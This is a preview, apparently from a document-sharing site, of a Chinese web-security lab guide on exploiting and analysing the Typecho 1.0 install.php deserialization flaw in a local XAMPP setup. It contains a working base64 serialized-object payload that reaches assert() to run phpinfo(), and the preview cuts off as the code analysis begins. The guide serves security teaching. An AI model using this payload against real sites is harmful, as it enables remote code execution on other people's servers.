网站大量收购独家精品文档,联系QQ:2885784924

Web安全与防护 实训指南 9.1Typecho1.0反序列化漏洞利用与分析.pdf

Web安全与防护 实训指南 9.1Typecho1.0反序列化漏洞利用与分析.pdf

  1. 1、本文档共10页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

Typecho1.0反序列化漏洞利用与分析

【实训目的】

1.掌握反序列化漏洞形成的原因与危害;

2.掌握反序列化漏洞的检测方法;

3.掌握反序列化漏洞的防范方法。

【实训原理】

Typecho是一个简单,轻巧的博客程序。其基于PHP,使用多种数据库(Mysql,

PostgreSQL,SQLite)储存数据。在GPLVersion2许可证下发行,是一个开源的

程序。在其早期版本Typecho1.0-14.10.10版本的install.php中存在反序列化漏洞,

利用该版本存在的反序列化漏洞演示其发现与利用的过程。

【实训步骤】

步骤1、下载typecho1.0-14.10.10版本。

/typecho/typecho/tags。

步骤2、安装typecho。

(1)本示例的运行环境是XAMPP(具体安装方法,请参见项目1实训),将

下载的文件解压到WEB服务器的安装目录,即XAMPP\HTDOCS\typecho。

(2)登录mysql数据库,通过CREATEDATABASEtypechodefaultcharsetutf8;

命令创建typecho数据库。

(3)在URL中输入:/typecho/install.php,即可安装成功。

步骤3、利用反序列化漏洞。

(1)使用火狐浏览器及hackbar插件,如下图所示:

图9-6火狐浏览器hackbar插件

勾选图片红色标注处的Post、Referrer。

(2)url中添加finish=1,在PostData和referrer填写数据如下:

图9-7Typecho反列序列化漏洞的利用

PostData:

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRm

VlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjt

zOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6I

nRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUw

ODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1Jlc

XVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzO

jEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX

1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV

0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1Jlc

XVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm

8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7cz

o2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30

Referrer:http://localhost/

(3)点击Excute按钮,将出现如下界面:

图9-8Typecho反列序列化漏洞的利用结果

即运行了phpinfo()命令。

步骤4、分析反序列化漏洞。

(1)寻找可控的反序列化输入点。

通过VisualStudioCode工具打开typecho的源文件。install.php文件使用

unserialize函数进行了反序列化,其参数为

您可能关注的文档

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档